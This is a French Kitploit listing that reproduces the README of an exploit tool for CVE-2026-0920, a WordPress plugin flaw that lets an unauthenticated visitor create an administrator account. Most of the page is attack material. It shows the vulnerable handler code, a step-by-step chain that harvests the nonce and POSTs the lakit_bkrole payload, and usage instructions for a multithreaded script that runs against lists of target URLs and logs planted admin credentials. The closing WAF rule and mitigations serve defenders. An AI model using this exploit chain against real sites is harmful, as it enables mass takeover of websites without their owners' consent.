Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via une porte dérobée permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-0920-
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et Éducation
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via une porte dérobée permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole

Voir le dépôt
21il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-0920-

LA-Studio Element Kit pour Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via backdoor permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 L'exploit est publié ici en premier. Suivez @KNxploited sur Telegram — votre flux d'élite pour les CVE fraîchement divulguées, les PoC fonctionnels et la recherche en sécurité de précision. Mis à jour sans relâche. Conçu pour ceux qui gardent une longueur d'avance.


🧠 Présentation

CVE-2026-0920 est une vulnérabilité critique avec un score CVSS de 9.8 découverte dans le plugin WordPress LA-Studio Element Kit for Elementor.

Le défaut se situe dans la fonction ajax_register_handle(), qui traite les inscriptions d'utilisateurs non authentifiés via AJAX. La fonction n'impose aucune restriction sur le paramètre lakit_bkrole — permettant à un attaquant totalement non authentifié de s'attribuer lui-même le rôle administrator lors de l'inscription, réalisant ainsi une prise de contrôle complète de l'administration WordPress en une seule requête.


💀 Analyse approfondie de la vulnérabilité

La cause racine est l'absence de vérification des capacités du rôle dans le gestionnaire d'inscription AJAX du plugin :

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Pourquoi c'est critique :

  • wp_ajax_nopriv_* = accessible par n'importe qui sans aucune authentification
  • lakit_bkrole accepte n'importe quelle chaîne de rôle WordPress — y compris administrator
  • Une seule requête POST crée un compte administrateur entièrement privilégié
  • Le nonce requis est exposé publiquement dans le HTML/JS du front-end du site
  • Aucune limitation de débit, aucune application de CAPTCHA par défaut, aucune vérification par e-mail requise

⚔️ Chaîne d'exploitation

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Prérequis

root@kitploit:~
pip install requests colorama
DépendanceObjectif
requestsRequêtes HTTP, gestion de session, gestion des cookies

Python 3.10+ recommandé (utilise les annotations de type union str | None).


📂 Structure des fichiers

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Utilisation

Étape 1 — Configurer les identifiants (Optionnel)

Ouvrez CVE-2026-0920.py et modifiez les constantes en haut du fichier pour définir les détails de votre compte administrateur :

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Étape 2 — Préparer les cibles

Créez list.txt avec une URL cible par ligne :

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Les URL sans schéma reçoivent automatiquement le préfixe https://.


Étape 3 — Lancer l'exploit

root@kitploit:~
python CVE-2026-0920.py

Vous serez invité à saisir :

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Étape 4 — Surveiller la sortie en direct

Le script produit une sortie terminal en temps réel, avec code couleur :

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
CouleurSignification

Étape 5 — Examiner les résultats

Les exploits réussis sont écrits dans success_results.txt :

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

Chaque ligne contient le tableau complet : cible, identifiants, statut de connexion, statut de la réponse AJAX et le nonce utilisé.


🖥️ Référence des paramètres du script


🔬 Logique de vérification

Le script effectue une vérification en deux étapes pour éliminer les faux positifs :

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

Cela élimine les faux positifs causés par les sites qui renvoient 200 OK sur AJAX mais échouent silencieusement l'inscription.


📊 Signature de détection

L'exploit génère ce schéma réseau spécifique — pour les défenseurs et les auteurs de WAF :

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

Règle WAF / IDS (pseudocode) :

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ Atténuation et remédiation

Si vous êtes propriétaire de site, développeur ou défenseur, agissez immédiatement :

  • ✅ Mettez à jour LA-Studio Element Kit for Elementor vers une version supérieure à 1.5.6.3
  • ✅ Désactivez et supprimez le plugin jusqu'à l'installation d'une version corrigée confirmée
  • ✅ Auditez tous les comptes administrateur WordPress — supprimez immédiatement toute entrée non reconnue
  • ✅ Appliquez une validation de rôle côté serveur — ne faites jamais confiance aux valeurs de rôle fournies par l'utilisateur sans vérification par liste blanche
  • ✅ Bloquez au niveau du WAF les requêtes POST non authentifiées vers admin-ajax.php contenant lakit_bkrole
  • ✅ Surveillez les journaux d'activité du serveur et de WordPress pour les appels d'action AJAX lakit_ajax
  • ✅ Activez l'authentification à deux facteurs sur tous les comptes administrateur existants comme mesure de confinement
  • ✅ Consultez l'avis de Wordfence et appliquez toutes les étapes de durcissement recommandées

⚠️ Avertissement

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 Auteur

PseudoNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Suivez @KNxploited sur Telegram CVE fraîches. Exploits fonctionnels. Recherche de vulnérabilités approfondie. Premiers informés. Premiers à agir. Ne soyez pas le dernier.


Conçu avec précision par Nxploited · Pour la recherche en sécurité autorisée uniquement · CVSS 9.8 Critique
Télécharger l’outil
ChampDétails
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versions affectéesToutes les versions jusqu'à la 1.5.6.3 incluse
Type de vulnérabilitéÉlévation de privilèges non authentifiée / Création d'administrateur
Vecteur d'attaqueRéseau — Aucune authentification requise
Score CVSS 3.19.8 CRITIQUE
Vecteur CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactPrise de contrôle totale de l'administrateur WordPress
ChercheurNxploited
colorama
Sortie terminal colorée sur toutes les plateformes
threadingTraitement concurrent de plusieurs cibles
reExtraction du nonce par expressions régulières depuis le HTML/JS
🔵 Cyan [*]Informations — étape en cours
🟢 Vert [+]Signal positif — succès partiel ou complet
🟡 Jaune [!]Avertissement — résultat ambigu, à vérifier
🔴 Rouge [-]Échec — cible non exploitable ou erreur
ParamètreDéfautDescription
Fichier de cibleslist.txtFichier contenant les URL cibles
Threads10 (max : 50)Workers concurrents
ADMIN_EMAIL[email protected]E-mail du compte administrateur injecté
ADMIN_PASSWORDadminSAMot de passe du compte administrateur injecté
ADMIN_USERNAMENx_adminNom d'utilisateur du compte administrateur injecté